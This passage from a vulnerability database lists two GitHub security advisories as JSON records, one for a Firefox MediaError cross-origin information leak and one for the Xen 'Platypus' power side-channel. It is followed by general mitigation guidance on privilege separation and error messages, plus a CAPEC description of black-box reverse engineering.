      "score": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-HC2G-X3VC-QHJ4

Vulnerability from github – Published: 2022-12-22 21:30 – Updated: 2025-04-15 21:31
VLAI
Details

The MediaError message property should be consistent to avoid leaking information about cross-origin resources; however for a same-site cross-origin resource, the message could have leaked information enabling XS-Leaks attacks. This vulnerability affects Firefox < 102.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2022-34477"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-203"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2022-12-22T20:15:00Z",
    "severity": "HIGH"
  },
  "details": "The MediaError message property should be consistent to avoid leaking information about cross-origin resources; however for a same-site cross-origin resource, the message could have leaked information enabling XS-Leaks attacks. This vulnerability affects Firefox \u003c 102.",
  "id": "GHSA-hc2g-x3vc-qhj4",
  "modified": "2025-04-15T21:31:26Z",
  "published": "2022-12-22T21:30:29Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-34477"
    },
    {
      "type": "WEB",
      "url": "https://bugzilla.mozilla.org/show_bug.cgi?id=1731614"
    },
    {
      "type": "WEB",
      "url": "https://www.mozilla.org/security/advisories/mfsa2022-24"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-HG2F-7X6W-X2HX

Vulnerability from github – Published: 2022-05-24 17:34 – Updated: 2022-05-24 17:34
VLAI
Details

Xen through 4.14.x allows guest OS administrators to obtain sensitive information (such as AES keys from outside the guest) via a side-channel attack on a power/energy monitoring interface, aka a "Platypus" attack. NOTE: there is only one logically independent fix: to change the access control for each such interface in Xen.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2020-28368"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-203",
      "CWE-862"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2020-11-10T19:15:00Z",
    "severity": "MODERATE"
  },
  "details": "Xen through 4.14.x allows guest OS administrators to obtain sensitive information (such as AES keys from outside the guest) via a side-channel attack on a power/energy monitoring interface, aka a \"Platypus\" attack. NOTE: there is only one logically independent fix: to change the access control for each such interface in Xen.",
  "id": "GHSA-hg2f-7x6w-x2hx",
  "modified": "2022-05-24T17:34:04Z",
  "published": "2022-05-24T17:34:04Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-28368"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5J66QUUHXH2RR4CNCKQRGVXVSOUFRPDA"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XV23EZIMNLJN4YXRRXLQV2ALW6ZEALXV"
    },
    {
      "type": "WEB",
      "url": "https://platypusattack.com"
    },
    {
      "type": "WEB",
      "url": "https://www.debian.org/security/2020/dsa-4804"
    },
    {
      "type": "WEB",
      "url": "https://www.zdnet.com/article/new-platypus-attack-can-steal-data-from-intel-cpus"
    },
    {
      "type": "WEB",
      "url": "https://xenbits.xen.org/xsa/advisory-351.html"
    },
    {
      "type": "WEB",
      "url": "http://www.openwall.com/lists/oss-security/2020/11/26/1"
    },
    {
      "type": "WEB",
      "url": "http://xenbits.xen.org/xsa/advisory-351.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

Mitigation MIT-46
Architecture and Design

Strategy: Separation of Privilege

  • Compartmentalize the system to have "safe" areas where trust boundaries can be unambiguously drawn. Do not allow sensitive data to go outside of the trust boundary and always be careful when interfacing with a compartment outside of the safe area.
  • Ensure that appropriate compartmentalization is built into the system design, and the compartmentalization allows for and reinforces privilege separation functionality. Architects and designers should rely on the principle of least privilege to decide the appropriate time to use privileges and the time to drop privileges.
Mitigation MIT-39
Implementation
  • Ensure that error messages only contain minimal details that are useful to the intended audience and no one else. The messages need to strike the balance between being too cryptic (which can confuse users) or being too detailed (which may reveal more than intended). The messages should not reveal the methods that were used to determine the error. Attackers can use detailed information to refine or optimize their original attack, thereby increasing their chances of success.
  • If errors must be captured in some detail, record them in log messages, but consider what could occur if the log messages can be viewed by attackers. Highly sensitive information such as passwords should never be saved to log files.
  • Avoid inconsistent messaging that might accidentally tip off an attacker about internal state, such as whether a user account exists or not.
CAPEC-189: Black Box Reverse Engineering

An adversary discovers the structure, function, and composition of a type of computer software through black box analysis techniques. 'Black Box' methods involve interacting with the software indirectly, in the absence of direct access to the executable object. Such analysis typically involves interacting with the software at the boundaries of where the software interfaces with a larger execution environment, such as input-output vectors, libraries, or APIs. Black Box Reverse Engineering also refers to gathering physical side effects of a hardware device, such as electromagnetic radiation or sounds.